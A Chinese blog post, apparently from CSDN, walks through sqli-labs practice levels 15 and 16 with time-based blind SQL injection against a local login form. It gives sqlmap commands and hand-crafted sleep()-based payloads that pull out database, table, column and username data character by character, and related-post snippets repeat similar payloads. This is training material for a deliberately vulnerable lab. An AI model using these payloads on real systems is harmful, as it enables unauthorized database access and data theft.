sqli-labs靶场15-16关(基于POST时间盲注)

最新推荐文章于 2024-05-06 15:38:01 发布
最新推荐文章于 2024-05-06 15:38:01 发布
阅读量848 收藏 3
点赞数
分类专栏: sqli-labs靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111087190
版权

第十五关

sqlmap方法

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-15/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T

基于时间的盲注
源码分析
闭合字符是单引号
在这里插入图片描述一、判断注入点

uname=admin' and sleep(4) #&passwd=&submit=Submit

因为是时间盲注,所以判断注入点要使用sleep函数
很明显感到了回显变慢了
在这里插入图片描述一、爆库

uname=admin' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)) =105,sleep(4),1 ) #&passwd=&submit=Submit

因为第一个是i,对应的ascii码是105
在这里插入图片描述在这里插入图片描述二、爆表

uname=admin' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(4),1)--+ #&passwd=&submit=Submit (u)

在这里插入图片描述三、爆字段

uname=admin' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(4),1)--+ #&passwd=&submit=Submit (i)

在这里插入图片描述四、爆数据

uname=admin' and If(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(4),1)--+ #&passwd=&submit=Submit (D)

在这里插入图片描述剩下的以此类推

第十六关

sqlmap方法

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-16/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T

源码分析
在这里插入图片描述闭合字符为(””)

判断注入点

uname=admin") and (sleep(4))#&passwd=&submit=Submit

在这里插入图片描述下边的步骤和十五关一样

24team
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
sqli-labs靶场15-19过小记
xtx4506的博客
04-17 2734
level-15 首先判断是否有sql注入攻击,先输入万能密码’ or 1=1# 试了试发现登录成功 可以看到是存在sql注入的,输入单引号后不报错,推断可能是盲注,分析一下源码 可以看到报错信息是被注释的,所以可以采用布尔型或时间盲注,因为我个人比较喜欢使用时间盲注,所以可以一步一步推断出数据库,表,字段 然后一个一个爆字段就好啦,因为我这边已经知道库名,如果不知道的话可以使用ascii码一步一步缩小范围确定字符 payload:' and if(substr((select g
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sqli-labs15(基于post提交的单引号布尔盲注)通思路
zyh1588的博客
11-11 854
小白回顾sql靶场15
SQLI-labs-第十五和第十六
weixin_54055099的博客
05-06 908
Sqlilab的第十五和十六时间盲注
sqli-labs靶场15-19笔记中总结
weixin_45585955的博客
04-16 3824
第十五属于时间注入,基于源码分析,闭合字符是单引号。 本没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。 那这里对 id 进行 ‘ id’ 的处理。 本我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录,不正确的时候这里会延时 5 秒。 第十六
sqli-lab 1-16随笔记
m0_52361291的博客
06-08 295
前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍 由于是直接刷所以只是让卡报出注入点其余的都没搞。首先明确SQL注入产生的原理是传递结构化语言时影响了数据库的执行叫做SQL注入。这些卡都是统一的get型注入而且都是通过联合查询的 代码中通过mysql_query()和mysql_fetch_array()这两个函数先执行查询语句然后再将同一行的数据以数组形式输出,调用数据库列名称来呈现查询结果而mysql_error()这个函数的作用是输出mysql数据库报错的信息这也是做联合查询时的一个
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
最新发布
05-30
sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入、盲注时间延迟注入等,理解它们的工作原理以及如何避免这些漏洞。靶场通常包含一系列逐步增加难度的挑战,每个挑战都模拟了一个具有特定漏洞的真实...
sqli-lib靶场1-15教程
m0_56109788的博客
04-25 1173
sqli-lib靶场1-15教程
sqli-labs-master第1516
m_ing
05-13 2225
前言:在第九我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。 第15 http://192.168.89.134/sqli-labs-master/Less-15/ 我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注 我们看下源代码: 猜想正确 我们采用延迟盲注时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。) admin’ and if(lengt
sqli-labs靶场第十五
gou1791241251的博客
12-27 950
第十五没什么特殊的,只是单引号闭合而已。
SQL注入——sqli-labs靶场(13~20)
m0re's blog
04-30 1332
本文目录 前言:SQL注入必须要拿下,所以继续学习并在靶场实验。 再次学习SQL注入知识,再补充一些基本知识。 注入通过在URL中修改对应的id值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜扛 来探测是否存在注入点。 ...
sqli-labs靶场15-19过笔记
weixin_62884797的博客
04-16 718
15 我们按照老办法,输入单引号查看回显信息,但没有到没有,显然,他极有可能是无回显报错,那就是盲注了。 先bp抓包 发现他是post的请求,我们就在bp中改包注入一下 admin' and 1=1 23% 发现登陆成功,确实有注入点,但是无回显,我们就需要盲注了。 uname=admin' and sleep(5) 23%&passwd=admin&submit=Submit 在bp中,我们等了一会儿他回显的,我们可以确定,可以使用时间盲注了。 uname=adm
sqli-labs(16
jimggg的博客
03-20 194
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST盲注) ") and if(ascii(substr((select database()) ,1,1))>116,1,sleep(5))#
sqli-lab16
weixin_30851867的博客
05-25 117
现实证明 英语好才能学渗透 基于bool类型的时间盲注 双引号 0X01爱之初体验 说实话我还没有找到 盲注的时候怎么判断闭合的方法 so 这里我直接看源码 这里的语句应该是 (“”)这种的闭合形式 so我们尝试一下 ") and if(ascii(substr((select database()) ,1,1))>116,1,sleep(5))# 看看...
sqli-labs靶场第十六
gou1791241251的博客
12-27 749
第十六:闭合方式为")。其余获取信息操作与其他卡一致
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值